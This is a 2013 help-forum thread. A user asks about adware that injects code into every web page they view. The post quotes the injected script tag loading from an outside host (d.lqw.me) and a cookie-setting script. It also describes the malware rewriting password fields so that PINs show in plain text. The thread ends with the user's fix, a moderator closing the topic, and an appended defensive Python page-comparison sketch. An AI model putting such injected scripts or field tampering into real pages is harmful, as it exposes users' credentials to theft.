
Possible Hijacking?


  • This topic is locked

#1 tyler123


Posted 28 November 2013 - 05:44 AM

Hello,

 

I noticed upon viewing the source of some websites that the same code is in the source of whatever page I'm viewing. I've checked quite a few pages to make sure it's not the website, and it's not. At the top of the page, the following code is displayed:

<script type="text/javascript" id="2f2a695a6afce2c2d833c706cd677a8e" src="http://d.lqw.me/xuiow/?g=14D55225-3866-41E2-141F-89A0CAC28320&s=8F71DB22-A8DF-4C0D-A26C-2142A9317F6A&z=1385446817"></script>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta http-equiv="Content-Script-Type" content="text/javascript">
<script type="text/javascript">
function getCookie(c_name) { // Local function for getting a cookie value
    if (document.cookie.length > 0) {
        c_start = document.cookie.indexOf(c_name + "=");
        if (c_start!=-1) {
        c_start=c_start + c_name.length + 1;
        c_end=document.cookie.indexOf(";", c_start);

        if (c_end==-1) 
            c_end = document.cookie.length;

        return unescape(document.cookie.substring(c_start,c_end));
        }
    }
    return "";
}
function setCookie(c_name, value, expiredays) { // Local function for setting a value of a cookie
    var exdate = new Date();
    exdate.setDate(exdate.getDate()+expiredays);
    document.cookie = c_name + "=" + escape(value) + ((expiredays==null) ? "" : ";expires=" + exdate.toGMTString()) + ";path=/";
}
function getHostUri() {
    var loc = document.location;
    return loc.toString();
}
setCookie('YPF8827340282Jdskjhfiw_928937459182JAX666', '*MY IP HERE*', 10);
location.hre = getHostUri();
</script>

What brought this to my attention is that a site that requires me to put in an encrypted PIN to continue is outputting the PIN in plain text, rather than encrypted. I viewed the page source and noticed it's replacing the:

<input type="password">

as

<input type="passwod">

I double checked the legitimate file and it's spelled correctly. It also works for my colleagues as well. This isn't just happening on Google Chrome, it's happening on all browsers such as Opera, IE, Chrome, and Firefox. 

 

Things I've attempted to do to troubleshoot the issue:

- System Restore.

- Cleared cookies in Chrome.

- Ran Malwarebytes (detected loads and removed malicious files).

- Ran ComboFix (detected loads and removed malicious files) ~ I was referred to this topic: http://forums.informaction.com/viewtopic.php?f=8&t=10473.

- Ran SpyBot (detected loads and removed malicious files).

- Ran SUPERAntiSpyware (detected loads and removed malicious files).

 

At the end of all of this troubleshooting, I'm still left with this problem and it's really confusing me. Hopefully someone here can help me.

 

Thanks.
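An added example, not part of the original post: a Python sketch of the comparison the poster did by hand, checking the page source as received on the affected machine against a known-good copy (for instance one saved on a colleague's machine) and listing external script hosts that only the local copy contains, plus any input type values that differ. The class and function names and both sample pages are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit


class PageFacts(HTMLParser):
    """Collect external script hosts and <input type=...> values, in order."""

    def __init__(self):
        super().__init__()
        self.script_hosts = set()
        self.input_types = []

    def handle_starttag(self, tag, attrs):
        attr = dict(attrs)
        if tag == "script" and attr.get("src"):
            host = urlsplit(attr["src"]).netloc.lower()
            if host:  # a relative src is same-origin and is skipped
                self.script_hosts.add(host)
        elif tag == "input":
            self.input_types.append((attr.get("type") or "text").lower())


def collect(html):
    facts = PageFacts()
    facts.feed(html)
    facts.close()
    return facts


def compare(local_html, reference_html):
    """Report what the local copy has that the known-good copy does not."""
    local, ref = collect(local_html), collect(reference_html)
    return {
        "injected_script_hosts": sorted(local.script_hosts - ref.script_hosts),
        "changed_input_types": [
            (r, l) for r, l in zip(ref.input_types, local.input_types) if r != l
        ],
    }


# Constructed sample pages (not captured traffic). The injected host and the
# "passwod" misspelling are the two symptoms described in the post.
REFERENCE = """<html><head><script src="/js/site.js"></script></head>
<body><form><input type="text" name="user"><input type="password" name="pin"></form></body></html>"""
LOCAL = """<script type="text/javascript" src="http://d.lqw.me/xuiow/?g=CONSTRUCTED"></script>
<html><head><script src="/js/site.js"></script></head>
<body><form><input type="text" name="user"><input type="passwod" name="pin"></form></body></html>"""

if __name__ == "__main__":
    print(compare(LOCAL, REFERENCE))
```

A difference that shows up in every browser and on unrelated sites, as described above, points at something on the machine or network path modifying responses rather than at any one website.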





#2 tyler123


Posted 28 November 2013 - 06:31 AM

UPDATE: Fixed this. Apparently something with "ScorpianSaver" was found in my Program Files and I had to use Unlocker to kill the process. It deleted everything except "Adpeak.exe", which was then deleted upon reboot by Unlocker. I attempted to go to the websites and it was fixed. :)



#3 Orange Blossom


Posted 01 December 2013 - 02:25 AM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.
Help us help you. If HelpBot replies, you MUST follow step 1 in its reply so we know you need help.

Orange Blossom

An ounce of prevention is worth a pound of cure

SpywareBlaster, WinPatrol Plus, ESET Smart Security, Malwarebytes' Anti-Malware, NoScript Firefox ext., Norton noscript



